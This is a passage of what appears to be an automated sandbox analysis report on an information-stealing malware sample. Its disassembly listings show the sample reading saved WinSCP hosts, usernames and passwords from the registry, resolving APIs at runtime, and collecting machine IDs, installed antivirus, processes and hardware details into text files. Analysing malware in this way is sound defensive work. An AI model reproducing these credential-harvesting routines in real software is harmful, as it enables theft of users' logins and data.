                                                                                                                                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0040E2E0
                                                                                                                                                        • RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,Host: ,Soft: WinSCP,004368E7), ref: 0040E379
                                                                                                                                                        • RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,?), ref: 0040E3D9
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _memset$Value$Open$Enum
                                                                                                                                                        • String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
                                                                                                                                                        • API String ID: 3303087153-2798830873
                                                                                                                                                        • Opcode ID: 9cb75a7071ecb74fff9e56ced005ca6b64a065f8bcd1bf242cfed6becfa28f4e
                                                                                                                                                        • Instruction ID: 1c66541d4828bd9326f921050ea70c7b79589cb9660c5b8585550bf775721ac0
                                                                                                                                                        • Opcode Fuzzy Hash: 9cb75a7071ecb74fff9e56ced005ca6b64a065f8bcd1bf242cfed6becfa28f4e
                                                                                                                                                        • Instruction Fuzzy Hash: B5D1D6B295012DAADF20EB91DC42BD9B778AF04308F5018EBA508B3151DA747FC9CFA5
                                                                                                                                                        Function 00418643 Relevance: 48.2, APIs: 32, Instructions: 154libraryloaderCOMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 1171 418643-418653 call 41859a 1174 418844-4188a1 LoadLibraryA * 5 1171->1174 1175 418659-41883f call 407d47 GetProcAddress * 20 1171->1175 1177 4188a3-4188b0 GetProcAddress 1174->1177 1178 4188b5-4188bc 1174->1178 1175->1174 1177->1178 1180 4188e7-4188ee 1178->1180 1181 4188be-4188e2 GetProcAddress * 2 1178->1181 1182 4188f0-4188fd GetProcAddress 1180->1182 1183 418902-418909 1180->1183 1181->1180 1182->1183 1185 41890b-418918 GetProcAddress 1183->1185 1186 41891d-418924 1183->1186 1185->1186 1187 418926-41894a GetProcAddress * 2 1186->1187 1188 41894f 1186->1188 1187->1188
                                                                                                                                                        APIs
                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 00418684
                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 0041869B
                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 004186B2
                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 004186C9
                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 004186E0
                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 004186F7
                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 0041870E
                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 00418725
                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 0041873C
                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 00418753
                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 0041876A
                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 00418781
                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 00418798
                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 004187AF
                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 004187C6
                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 004187DD
                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 004187F4
                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 0041880B
                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 00418822
                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 00418839
                                                                                                                                                        • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041884A
                                                                                                                                                        • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041885B
                                                                                                                                                        • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041886C
                                                                                                                                                        • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041887D
                                                                                                                                                        • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041888E
                                                                                                                                                        • GetProcAddress.KERNEL32(75B30000,004184C2), ref: 004188AA
                                                                                                                                                        • GetProcAddress.KERNEL32(751E0000,004184C2), ref: 004188C5
                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 004188DC
                                                                                                                                                        • GetProcAddress.KERNEL32(76910000,004184C2), ref: 004188F7
                                                                                                                                                        • GetProcAddress.KERNEL32(75670000,004184C2), ref: 00418912
                                                                                                                                                        • GetProcAddress.KERNEL32(77310000,004184C2), ref: 0041892D
                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 00418944
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressProc$LibraryLoad
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2238633743-0
                                                                                                                                                        • Opcode ID: 4153ecd493db34a1094e14b788043fe07f5e2afe7ddd22b5ff6fe96697fb63f9
                                                                                                                                                        • Instruction ID: 2c76b628124a1797fdce28c748a09696ce6250a2eaa67b4899ff399dadce2328
                                                                                                                                                        • Opcode Fuzzy Hash: 4153ecd493db34a1094e14b788043fe07f5e2afe7ddd22b5ff6fe96697fb63f9
                                                                                                                                                        • Instruction Fuzzy Hash: 96711675910312AFEF1ADF60FD088243BA7F70874BF10A426E91582270EB374A64EF55
                                                                                                                                                        Function 00413B86 Relevance: 47.9, APIs: 2, Strings: 25, Instructions: 674stringCOMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 1189 413b86-4145a5 call 4104e7 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410cc0 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4115d4 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411684 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4109a2 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 GetCurrentProcessId call 41224a call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410b30 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411807 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411997 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410c85 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410c53 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411563 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410ddb call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410cc0 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410d2e call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410f51 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411007 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410fba call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411119 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411192 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4114a5 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411203 call 4105c7 call 41058d call 402920 * 2 call 411203 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 401cfd lstrlenA call 4104e7 call 416e97 call 402920 * 2 call 401cde
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                          • Part of subcall function 00410CC0: GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,004365B6,?,?,?), ref: 00410CD8
                                                                                                                                                          • Part of subcall function 00410CC0: HeapAlloc.KERNEL32(00000000), ref: 00410CDF
                                                                                                                                                          • Part of subcall function 00410CC0: GetLocalTime.KERNEL32(?), ref: 00410CEB
                                                                                                                                                          • Part of subcall function 00410CC0: wsprintfA.USER32 ref: 00410D16
                                                                                                                                                          • Part of subcall function 004115D4: _memset.LIBCMT ref: 00411607
                                                                                                                                                          • Part of subcall function 004115D4: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00411626
                                                                                                                                                          • Part of subcall function 004115D4: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 0041164B
                                                                                                                                                          • Part of subcall function 004115D4: CharToOemA.USER32(?,?), ref: 0041166B
                                                                                                                                                          • Part of subcall function 00411684: GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
                                                                                                                                                          • Part of subcall function 00411684: _memset.LIBCMT ref: 004116CE
                                                                                                                                                          • Part of subcall function 00411684: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
                                                                                                                                                          • Part of subcall function 00411684: lstrcatA.KERNEL32(?,00436ECC,?,?,?,?,?), ref: 00411713
                                                                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                          • Part of subcall function 004109A2: GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 004109D5
                                                                                                                                                          • Part of subcall function 004109A2: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00410A15
                                                                                                                                                          • Part of subcall function 004109A2: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00410A6A
                                                                                                                                                          • Part of subcall function 004109A2: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410A71
                                                                                                                                                        • GetCurrentProcessId.KERNEL32(Path: ,0043687C,HWID: ,00436870,GUID: ,00436864,00000000,MachineID: ,00436854,00000000,Date: ,00436848,00436844,004379AC,Version: ,004365B6), ref: 00413DDB
                                                                                                                                                          • Part of subcall function 0041224A: OpenProcess.KERNEL32(00000410,00000000,=A,00000000,?), ref: 0041226C
                                                                                                                                                          • Part of subcall function 0041224A: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00412287
                                                                                                                                                          • Part of subcall function 0041224A: CloseHandle.KERNEL32(00000000), ref: 0041228E
                                                                                                                                                          • Part of subcall function 00410B30: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B44
                                                                                                                                                          • Part of subcall function 00410B30: HeapAlloc.KERNEL32(00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B4B
                                                                                                                                                          • Part of subcall function 00411807: __EH_prolog3_catch_GS.LIBCMT ref: 0041180E
                                                                                                                                                          • Part of subcall function 00411807: CoInitializeEx.OLE32(00000000,00000000,0000004C,00413EF9,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 0041181F
                                                                                                                                                          • Part of subcall function 00411807: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411830
                                                                                                                                                          • Part of subcall function 00411807: CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 0041184A
                                                                                                                                                          • Part of subcall function 00411807: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411880
                                                                                                                                                          • Part of subcall function 00411807: VariantInit.OLEAUT32(?), ref: 004118DB
                                                                                                                                                          • Part of subcall function 00411997: __EH_prolog3_catch.LIBCMT ref: 0041199E
                                                                                                                                                          • Part of subcall function 00411997: CoInitializeEx.OLE32(00000000,00000000,00000030,00413F67,?,AV: ,004368C4,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 004119AD
                                                                                                                                                          • Part of subcall function 00411997: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004119BE
                                                                                                                                                          • Part of subcall function 00411997: CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 004119D8
                                                                                                                                                          • Part of subcall function 00411997: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411A0E
                                                                                                                                                          • Part of subcall function 00411997: VariantInit.OLEAUT32(?), ref: 00411A5D
                                                                                                                                                          • Part of subcall function 00410C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
                                                                                                                                                          • Part of subcall function 00410C85: RtlAllocateHeap.NTDLL(00000000,?,?,?,00401385), ref: 00410C98
                                                                                                                                                          • Part of subcall function 00410C85: GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC
                                                                                                                                                          • Part of subcall function 00410C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
                                                                                                                                                          • Part of subcall function 00410C53: HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
                                                                                                                                                          • Part of subcall function 00410C53: GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A
                                                                                                                                                          • Part of subcall function 00411563: CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 00411575
                                                                                                                                                          • Part of subcall function 00411563: GetDeviceCaps.GDI32(00000000,00000008), ref: 00411580
                                                                                                                                                          • Part of subcall function 00411563: GetDeviceCaps.GDI32(00000000,0000000A), ref: 0041158B
                                                                                                                                                          • Part of subcall function 00411563: ReleaseDC.USER32(00000000,00000000), ref: 00411596
                                                                                                                                                          • Part of subcall function 00411563: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00414098,?,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4), ref: 004115A2
                                                                                                                                                          • Part of subcall function 00411563: HeapAlloc.KERNEL32(00000000,?,?,00414098,?,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 004115A9
                                                                                                                                                          • Part of subcall function 00411563: wsprintfA.USER32 ref: 004115BB
                                                                                                                                                          • Part of subcall function 00410DDB: GetKeyboardLayoutList.USER32(00000000,00000000,0043670D,?,?), ref: 00410E0C
                                                                                                                                                          • Part of subcall function 00410DDB: LocalAlloc.KERNEL32(00000040,00000000), ref: 00410E1A
                                                                                                                                                          • Part of subcall function 00410DDB: GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410E28
                                                                                                                                                          • Part of subcall function 00410DDB: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00410E57
                                                                                                                                                          • Part of subcall function 00410DDB: LocalFree.KERNEL32(00000000), ref: 00410EFF
                                                                                                                                                          • Part of subcall function 00410D2E: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00410D49
                                                                                                                                                          • Part of subcall function 00410D2E: HeapAlloc.KERNEL32(00000000), ref: 00410D50
                                                                                                                                                          • Part of subcall function 00410D2E: GetTimeZoneInformation.KERNEL32(?), ref: 00410D5F
                                                                                                                                                          • Part of subcall function 00410D2E: wsprintfA.USER32 ref: 00410D7D
                                                                                                                                                          • Part of subcall function 00410F51: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C), ref: 00410F65
                                                                                                                                                          • Part of subcall function 00410F51: HeapAlloc.KERNEL32(00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410F6C
                                                                                                                                                          • Part of subcall function 00410F51: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ), ref: 00410F8A
                                                                                                                                                          • Part of subcall function 00410F51: RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000), ref: 00410FA6
                                                                                                                                                          • Part of subcall function 00411007: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,?), ref: 0041107D
                                                                                                                                                          • Part of subcall function 00411007: wsprintfA.USER32 ref: 004110DB
                                                                                                                                                          • Part of subcall function 00410FBA: GetSystemInfo.KERNEL32(?), ref: 00410FD4
                                                                                                                                                          • Part of subcall function 00410FBA: wsprintfA.USER32 ref: 00410FEC
                                                                                                                                                          • Part of subcall function 00411119: GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 00411131
                                                                                                                                                          • Part of subcall function 00411119: HeapAlloc.KERNEL32(00000000), ref: 00411138
                                                                                                                                                          • Part of subcall function 00411119: GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00411154
                                                                                                                                                          • Part of subcall function 00411119: wsprintfA.USER32 ref: 0041117A
                                                                                                                                                          • Part of subcall function 00411192: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 004111E9
                                                                                                                                                          • Part of subcall function 004114A5: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00436712,?,?), ref: 004114D4
                                                                                                                                                          • Part of subcall function 004114A5: Process32First.KERNEL32(00000000,00000128), ref: 004114E4
                                                                                                                                                          • Part of subcall function 004114A5: Process32Next.KERNEL32(00000000,00000128), ref: 00411542
                                                                                                                                                          • Part of subcall function 004114A5: CloseHandle.KERNEL32(00000000), ref: 0041154D
                                                                                                                                                          • Part of subcall function 00411203: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0043670F,00000000,?,?), ref: 00411273
                                                                                                                                                          • Part of subcall function 00411203: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 004112B0
                                                                                                                                                          • Part of subcall function 00411203: wsprintfA.USER32 ref: 004112DD
                                                                                                                                                          • Part of subcall function 00411203: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 004112FC
                                                                                                                                                          • Part of subcall function 00411203: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00411332
                                                                                                                                                          • Part of subcall function 00411203: lstrlenA.KERNEL32(?), ref: 00411347
                                                                                                                                                          • Part of subcall function 00411203: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00436E8C), ref: 004113DC
                                                                                                                                                        • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000), ref: 00414563
                                                                                                                                                          • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                                                          • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Heap$Process$Alloc$wsprintf$CreateOpen$InitializeQueryValuelstrcatlstrcpy$InformationLocalNamelstrlen$BlanketCapsCloseCurrentDeviceEnumHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariant_memset$AllocateCharComputerDevicesDirectoryDisplayFileFirstFreeGlobalH_prolog3_catchH_prolog3_catch_LocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZone
                                                                                                                                                        • String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
                                                                                                                                                        • API String ID: 3279995179-1014693891
                                                                                                                                                        • Opcode ID: 6126670baf250b2cd161e8f14be422fa99acf7c1130f51379d98b343847bea79
                                                                                                                                                        • Instruction ID: 792dbb826b946587ba76db5a11b028a2a1d9662385358a0031bce88e61b043bf
                                                                                                                                                        • Opcode Fuzzy Hash: 6126670baf250b2cd161e8f14be422fa99acf7c1130f51379d98b343847bea79
                                                                                                                                                        • Instruction Fuzzy Hash: 2A527D71D4001EAACF01FBA2DD429DDB7B5AF04308F51456BB610771A1DBB87E8E8B98
                                                                                                                                                        Function 004169B6 Relevance: 38.7, APIs: 8, Strings: 14, Instructions: 249sleepCOMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
                                                                                                                                                          • Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                          • Part of subcall function 004168C6: StrCmpCA.SHLWAPI(?,ERROR), ref: 0041691A
                                                                                                                                                          • Part of subcall function 004168C6: lstrlenA.KERNEL32(?), ref: 00416925
                                                                                                                                                          • Part of subcall function 004168C6: StrStrA.SHLWAPI(00000000,?), ref: 0041693A
                                                                                                                                                          • Part of subcall function 004168C6: lstrlenA.KERNEL32(?), ref: 00416949
                                                                                                                                                          • Part of subcall function 004168C6: lstrlenA.KERNEL32(00000000), ref: 00416962
                                                                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416AA0
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416AF9
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416B59
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BB2
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BC8
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BDE
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BF0
                                                                                                                                                        • Sleep.KERNEL32(0000EA60), ref: 00416BFF
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
